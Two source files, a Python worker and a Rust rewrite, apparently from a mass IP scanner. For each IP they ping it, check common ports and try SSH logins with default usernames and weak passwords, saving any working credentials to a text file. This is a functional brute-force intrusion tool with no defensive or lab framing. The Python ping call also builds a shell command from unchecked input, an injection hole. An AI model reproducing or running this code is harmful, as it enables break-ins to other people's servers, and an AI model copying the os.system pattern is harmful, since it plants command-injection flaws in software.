File: worker/task_handler.py
import time
from .logger import logger
from worker import BaseWorker
import asyncio
import socket
import os
import random
import paramiko

class AppTaskHandler(BaseWorker):
    async def handle(self, item):
        start = time.time()
        async def pingtest(item):
            await asyncio.sleep(random.random())
            try:
                result =  os.system(f"ping -w 5 "+ item)
                if result == 0:
                    with open("safePing.txt",'a+',encoding='UTF-8') as fe:
                        fe.write(f"{item}\n")
                    logger.info(f"Ip Is Available ping: {item}")
                return 
            except Exception as ex:
                logger.error(f"{ex}")

        async def pingtestsocket(item):
            await asyncio.sleep(random.random())
            s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            s.settimeout(1)
            for port in [13,22,23,80,443,3389]:
                try:
                    response = s.connect_ex((item,port))
                    if response == 0:
                        with open("safeSocketConnect.txt",'a+',encoding='UTF-8') as fe:
                            fe.write(f"{item}:{port}\n")
                        logger.info(f"Ip Is Available Socket: {item}:{port}")
                except Exception as ex:
                    logger.error(f"{ex}")
            return 
        
        async def sshtest(item):
            await asyncio.sleep(random.random())
            port = 22
            usernames = ["root", "admin", "user", "ubuntu"]
            passwords = ["root", "admin", "123456", "password", "1234", ""]
            
            # ابتدا بررسی می‌کنیم که پورت 22 باز است
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(2)
            try:
                response = s.connect_ex((item, port))
                if response != 0:
                    s.close()
                    return
            except Exception:
                s.close()
                return
            finally:
                s.close()
            
            # تلاش برای اتصال SSH
            for username in usernames:
                for password in passwords:
                    try:
                        ssh = paramiko.SSHClient()
                        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                        ssh.connect(
                            item, 
                            port=port, 
                            username=username, 
                            password=password, 
                            timeout=3,
                            allow_agent=False,
                            look_for_keys=False
                        )
                        # اگر اتصال موفق بود
                        with open("safeSSH.txt", 'a+', encoding='UTF-8') as fe:
                            fe.write(f"{item}:{port}:{username}:{password}\n")
                        logger.info(f"SSH connection successful: {username}@{item}:{port}")
                        ssh.close()
                        return  # پس از یافتن اولین اعتبار موفق، بقیه را امتحان نمی‌کنیم
                    except Exception:
                        pass
            return
        
        try:
            task = asyncio.create_task(pingtestsocket(item))
            task2 = asyncio.create_task(pingtest(item))
            task3 = asyncio.create_task(sshtest(item))
            await asyncio.gather(task, task2, task3)
        except Exception as ex:
            logger.error(f"{ex}")
        end = time.time()
        logger.info(f"Task-{item} completed in {end - start:.2f}s")
        return
        

File: ip_scanner_rust/src/task_handler.rs
use crate::worker_engine::TaskHandler;
use anyhow::Result;
use log::{info, error};
use std::fs::OpenOptions;
use std::io::Write;
use std::net::{SocketAddr, TcpStream};
use std::process::Command;
use std::time::{Duration, Instant};
use tokio::time::sleep;
use rand::Rng;
use ssh2::Session;

pub struct AppTaskHandler {
    safe_ping_file: String,
    safe_socket_file: String,
    safe_ssh_file: String,
}

impl AppTaskHandler {
    pub fn new(safe_ping_file: String, safe_socket_file: String, safe_ssh_file: String) -> Self {
        Self {
            safe_ping_file,
            safe_socket_file,
            safe_ssh_file,
        }
    }

    async fn ping_test(&self, ip: String) -> Result<()> {
        // کمی تاخیر تصادفی
        let delay = rand::thread_rng().gen_range(0..1000);
        sleep(Duration::from_millis(delay)).await;

        // اجرای دستور ping (Linux)
        let output = tokio::task::spawn_blocking({
            let ip = ip.clone();
            move || {
                Command::new("ping")
                    .arg("-c")
                    .arg("2")
                    .arg("-W")
                    .arg("5")
                    .arg(&ip)
                    .output()
            }
        })
        .await??;

        if output.status.success() {
            // ذخیره IP موفق
            if let Ok(mut file) = OpenOptions::new()
                .create(true)
                .append(true)
                .open(&self.safe_ping_file)
            {
                writeln!(file, "{}", ip)?;
            }
            info!("IP is available (ping): {}", ip);
        }

        Ok(())
    }

    async fn socket_test(&self, ip: String) -> Result<()> {
        // کمی تاخیر تصادفی
        let delay = rand::thread_rng().gen_range(0..1000);
        sleep(Duration::from_millis(delay)).await;

        let ports = vec![13, 22, 23, 80, 443, 3389];
        
        for port in ports {
            let addr = format!("{}:{}", ip, port);
            
            // تست اتصال TCP
            let result = tokio::task::spawn_blocking({
                let addr = addr.clone();
                move || {
                    if let Ok(parsed_addr) = addr.parse::<SocketAddr>() {
                        TcpStream::connect_timeout(&parsed_addr, Duration::from_secs(1))
                    } else {
                        Err(std::io::Error::new(std::io::ErrorKind::InvalidInput, "Invalid address"))
                    }
                }
            })
            .await?;

            if result.is_ok() {
                // ذخیره IP:Port موفق
                if let Ok(mut file) = OpenOptions::new()
                    .create(true)
                    .append(true)
                    .open(&self.safe_socket_file)
                {
                    writeln!(file, "{}:{}", ip, port)?;
                }
                info!("IP is available (socket): {}:{}", ip, port);
            }
        }

        Ok(())
    }

    async fn ssh_test(&self, ip: String) -> Result<()> {
        // کمی تاخیر تصادفی
        let delay = rand::thread_rng().gen_range(0..1000);
        sleep(Duration::from_millis(delay)).await;

        let port = 22;
        let usernames = vec!["root", "admin", "user", "ubuntu"];
        let passwords = vec!["root", "admin", "123456", "password", "1234", ""];
        
        let addr = format!("{}:{}", ip, port);
        
        // تست اتصال SSH
        let result = tokio::task::spawn_blocking({
            let ip = ip.clone();
            let safe_ssh_file = self.safe_ssh_file.clone();
            move || -> Result<bool> {
                if let Ok(parsed_addr) = addr.parse::<SocketAddr>() {
                    // ابتدا بررسی می‌کنیم که پورت 22 باز است یا نه
                    let tcp = match TcpStream::connect_timeout(&parsed_addr, Duration::from_secs(2)) {
                        Ok(stream) => stream,
                        Err(_) => return Ok(false),
                    };
                    
                    // تلاش برای اتصال SSH
                    let mut sess = Session::new()?;
                    sess.set_timeout(3000);
                    sess.set_tcp_stream(tcp);
                    
                    if let Err(_) = sess.handshake() {
                        return Ok(false);
                    }
                    
                    // تست username/password های مختلف
                    for username in &usernames {
                        for password in &passwords {
                            if let Ok(_) = sess.userauth_password(username, password) {
                                if sess.authenticated() {
                                    // ذخیره SSH موفق
                                    if let Ok(mut file) = OpenOptions::new()
                                        .create(true)
                                        .append(true)
                                        .open(&safe_ssh_file)
                                    {
                                        writeln!(file, "{}:{}:{}:{}", ip, port, username, password)?;
                                    }
                                    info!("SSH connection successful: {}:{}@{}", username, port, ip);
                                    return Ok(true);
                                }
                            }
                        }
                    }
                }
                Ok(false)
            }
        })
        .await?;
        
        result?;
        Ok(())
    }
}

#[async_trait::async_trait]
impl TaskHandler for AppTaskHandler {
    async fn handle(&self, ip: String) -> Result<()> {
        let start = Instant::now();
        
        // اجرای همزمان همه تست‌ها
        let ping_future = self.ping_test(ip.clone());
        let socket_future = self.socket_test(ip.clone());
        let ssh_future = self.ssh_test(ip.clone());
        
        let (ping_result, socket_result, ssh_result) = tokio::join!(ping_future, socket_future, ssh_future);
        
        if let Err(e) = ping_result {
            error!("Ping test error for {}: {}", ip, e);
        }
        
        if let Err(e) = socket_result {
            error!("Socket test error for {}: {}", ip, e);
        }
        
        if let Err(e) = ssh_result {
            error!("SSH test error for {}: {}", ip, e);
        }
        
        let elapsed = start.elapsed();
        info!("Task-{} completed in {:.2}s", ip, elapsed.as_secs_f64());
        
        Ok(())
    }
}
